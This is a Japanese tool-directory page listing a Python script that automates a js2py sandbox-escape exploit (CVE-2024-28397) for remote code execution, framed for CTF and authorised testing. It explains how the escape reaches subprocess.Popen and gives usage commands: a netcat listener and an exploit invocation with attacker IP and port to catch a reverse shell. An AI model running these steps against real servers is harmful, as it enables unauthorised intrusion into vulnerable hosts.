Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-28397-Exploit-Automation — **js2py Sandbox Escape** の脆弱性(CVE-2024-28397)を悪用するためのPython自動化スクリプトです。このツールは、脆弱なインスタンス上でリモートコード実行(RCE)を達成するためのペイロード生成・配信プロセスを自動化します。 | Kitploit
ツール/GitHubGitHub/l1337xi/cve-2024-28397-exploit-automation
ペイロード生成エクスプロイトウェブアプリケーション悪用CTF学習と教育リモートアクセスツール
GitHubl1337xi/cve-2024-28397-exploit-automation

CVE-2024-28397-Exploit-Automation

**js2py Sandbox Escape** の脆弱性(CVE-2024-28397)を悪用するためのPython自動化スクリプトです。このツールは、脆弱なインスタンス上でリモートコード実行(RCE)を達成するためのペイロード生成・配信プロセスを自動化します。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
229ヶ月前未レビュー

CVE-2024-28397 エクスプロイト自動化

js2py サンドボックスエスケープ の脆弱性(CVE-2024-28397)を悪用するための Python 自動化スクリプトです。このツールは、脆弱性のあるインスタンス上でリモートコード実行(RCE)を達成するためのペイロード生成および配信プロセスを自動化します。

⚠️ 法的免責事項 事前の相互同意なしに対象に攻撃を仕掛けるためにこのツールを使用することは違法です。このリポジトリは教育目的のみで提供されています。作者はこの情報の誤用について一切の責任を負いません。このツールは、権限が付与されたセキュリティ評価および Capture The Flag(CTF)環境での使用を意図しています。

🧐 脆弱性について

CVE-2024-28397 は js2py ライブラリ(バージョン < 0.74)に影響を与えます。このライブラリは、JavaScript 環境をホストの Python 環境から適切に分離できません。

  • 欠陥: 不適切な入力サニタイズにより、Python 内部の __class__ および __subclasses__ 属性へのアクセスが可能になります。
  • 影響: 攻撃者はオブジェクト階層を走査して subprocess.Popen にアクセスし、ホストサーバー上で任意のコマンドを実行することができます。

🚀 特徴

  • 自動ペイロード生成: JavaScript サンドボックスエスケープロジックを自動的に構築します。
  • Base64 エンコーディング: 送信中の構文エラーを防ぐために、ペイロードのエンコーディングを処理します。
  • 接続処理: リクエストのタイムアウトに基づいてシェル実行の成功を検出します。
  • プロフェッショナルな出力: ステータス更新を備えたクリーンな CLI インターフェース。

🛠️ 使用方法

前提条件

root@kitploit:~
pip install requests

Netcat リスナーを起動します:

root@kitploit:~
nc -lvnp 1337

スクリプトを実行します:

root@kitploit:~
python3 exploit.py -u <target url> -i <attacker ip> -p <attacker port>

📸 概念実証

以下は、脆弱性のあるターゲット(Hack The Box - CodeTwo)に対するツールの動作の様子です:

1. 実行

エクスプロイトを実行してペイロードを生成し、コールバックをトリガーします: crop3

2. 成功

リスナーでリバースシェルを受信します: リバースシェル成功

  • 📜 クレジット

  • 脆弱性の発見とコア JS ペイロード: Marven11

  • 自動化スクリプト: L1337Xi

  • コラボレーター:

    • Leyn4L
    • iamrizwanvp
    • axai457
ツールをダウンロード